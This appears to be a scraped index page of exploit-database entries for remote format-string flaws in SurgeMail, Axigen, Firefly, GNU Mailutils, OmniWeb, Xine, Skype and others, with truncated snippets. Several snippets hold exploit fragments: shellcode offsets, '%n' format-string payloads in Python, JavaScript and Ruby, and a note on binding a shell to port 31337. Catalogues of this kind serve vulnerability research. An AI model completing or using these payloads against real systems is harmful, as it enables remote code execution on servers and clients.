Surgemail and WebMail 3.0 - Page Remote Format String

Surgemail and WebMail 3.0 - Page Remote Format String source: https://www.securityfocus.com/bid/27990/info SurgeMail and WebMail are prone to a remote format-string vulnerability because the applications fail to properly sanitize user-supplied input before including it in the format-specifier...

Surgemail and WebMail 3.0 - 'Page' Remote Format String

source: https://www.securityfocus.com/bid/27990/info SurgeMail and WebMail are prone to a remote format-string vulnerability because the applications fail to properly sanitize user-supplied input before including it in the format-specifier argument of a formatted-printing function. A remote...

Axigen <= 5.0.2 AXIMilter Remote Format String Exploit

Exploit for linux platform in category remote exploits ====================================================== Axigen include include include include include include char buf = "FROM:\r\nEHLO:\r\nCNIP:\r\nCNPO:\r\nCNHO: " / offsets / "\xb8\x96\x05\x08\xb9\x96\x05\x08\xba\x96\x05\x08\xbb\x96\x05\x0...

Axigen 5.0.2 - AXIMilter Remote Format String

/ Axigen 5.0.x AXIMilter Format String Exploit by hempel JAN 16 2008 thx to mu-b digit-labs.org / include include include include include include include char buf = "FROM:\r\nEHLO:\r\nCNIP:\r\nCNPO:\r\nCNHO: " / offsets / "\xb8\x96\x05\x08\xb9\x96\x05\x08\xba\x96\x05\x08\xbb\x96\x05\x08"...

SonicWALL Global VPN Client 4.0.782 - Remote Format String

source: https://www.securityfocus.com/bid/26689/info SonicWALL Global VPN Client is prone to a remote format-string vulnerability because it fails to properly sanitize user-supplied input before passing it as the format specifier to a formatted-printing function. Successfully exploiting this issu...

[UPH-07-03] Firefly Media Server remote format string vulnerability

UPH-07-02 UnprotectedHex.com security advisory 07-02 Discovered by nnp Discovered : 1 August 2007 Reported to the vendor : 13 October 2007 Fixed by vendor : 21 October 2007 Vulnerability class : Remote format string Affected product : mt-dappd/Firefly Media Server Version : = 0.2.4 Product detail...

uph0703.py.txt

!C:\python25\python25.exe """ Advisory : UPH-07-03 mt-dappd/Firefly media server remote format string vulnerability Discovered by nnp http://www.unprotectedhex.com """ import sys import socket import base64 if lensys.argv != 3: sys.exit-1 fmtstr = base64.b64encode"%n"16 + ":" + "password" killmsg...

smbftpd 0.96 - SMBDirList-function Remote Format String

/ smbftpd 0.96 Proof of concept tested with smbftpd 0.96 compiled with gcc 3.3.6 1. write jumpcode to BSS mov dx, 0x1234 pop eax cmp ax, dx jne $-4 jmp esp 2. overwrite a GOT entry with the addr to BSS & send shellcode jerry: ./bleh -h localhost + GOT: 0x80591d8 - .bss jmpcode: 0x805a791 +...

GNU Mailutils imap4d 0.6 Remote Format String Exploit (exec-shield)

No description provided by source. / Fedora Core 6 exec-shield based GNU imap4d mailutils-0.6 search remote format string exploit by Xpl017Elz Advanced exploitation in exec-shield Fedora Core case study URL: http://x82.inetcop.org/h0me/papers/FCexploit/FCexploit.txt Reference:...

GNU Mailutils imap4d 0.6 Remote Format String Exploit (exec-shield)

Exploit for linux platform in category remote exploits =================================================================== GNU Mailutils imap4d 0.6 Remote Format String Exploit exec-shield =================================================================== / Fedora Core 6 exec-shield based GNU...

GNU Mailutils imap4d 0.6 - exec-shield Remote Format String

/ Fedora Core 6 exec-shield based GNU imap4d mailutils-0.6 search remote format string exploit by Xpl017Elz Advanced exploitation in exec-shield Fedora Core case study URL: http://x82.inetcop.org/h0me/papers/FCexploit/FCexploit.txt Reference: https://www.securityfocus.com/bid/14794 2005/09/09...

Axigen eMail Server 2.0.0b2 (pop3) Remote Format String Exploit

Exploit for linux platform in category remote exploits =============================================================== Axigen eMail Server 2.0.0b2 pop3 Remote Format String Exploit =============================================================== / axiagen.c Axigen eMail Server v2.0 beta by fuGich...

Axigen eMail Server 2.0.0b2 - &#039;pop3&#039; Remote Format String

/ axiagen.c Axigen eMail Server v2.0 beta by fuGich Tue Dec 5 2006 thanks to mu-b - Tested on: Axigen V2 beta logType for the pop3 service must be "system" and the logLevel set to any number with 4th bit set remote shell format string vulnerability in pop3 /bin/sh to bind to port 31337 optimised...

OmniWeb 5.5.1 Javascript alert() Remote Format String PoC

Exploit for macOS platform in category dos / poc ========================================================= OmniWeb 5.5.1 Javascript alert Remote Format String PoC ========================================================= MOAB-07-01-2007 / LMH / function boom var str = 'A'; while str.length...

OmniWeb 5.5.1 Javascript alert() Remote Format String PoC

No description provided by source. !DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" html head titleMOAB-07-01-2007/title script / LMH / function boom var str = 'A'; while str.length = 32 str+=str; str = str + '%n%n%n%n%n%n'; alertstr; /script /head...

OmniWeb 5.5.1 - JavaScript alert() Remote Format String (PoC)

OmniWeb 5.5.1 - JavaScript alert Remote Format String PoC MOAB-07-01-2007 / LMH / function boom var str = 'A'; while str.length milw0rm.com 2007-01-07...

iLife iPhoto Photocast - XML Title Remote Format String (PoC)

!/usr/bin/ruby c 2006 LMH bug by Kevin Finisterre proof of concept for MOAB-04-01-2007 see http://projects.info-pull.com/moab/MOAB-04-01-2007.rb require 'socket' IPHOTOFEED = "\r\n" + "\r\n" + "\r\n" + "" + "A" 256 + "%x.%n.%n.%n.%n.%n\r\n" + "\r\n" + "In Gruber We Trust\r\n" +...

Xine 0.99.4 - .m3u Remote Format String

Xine 0.99.4 - .m3u Remote Format String source: https://www.securityfocus.com/bid/22252/info The 'xine' program is prone to a remote format-string vulnerability because the application fails to properly sanitize user-supplied input before including it in the format-specifier argument of a...

Xine 0.99.4 - &#039;.m3u&#039; Remote Format String

source: https://www.securityfocus.com/bid/22252/info The 'xine' program is prone to a remote format-string vulnerability because the application fails to properly sanitize user-supplied input before including it in the format-specifier argument of a formatted-printing function. Successfully...

Skype Technologies Skype 1.5 - NSRunAlertPanel Remote Format String

Skype Technologies Skype 1.5 - NSRunAlertPanel Remote Format String source: https://www.securityfocus.com/bid/20218/info Skype is prone to a remote format-string vulnerability because the application fails to properly sanitize user-supplied input before using it in the format-specification argume...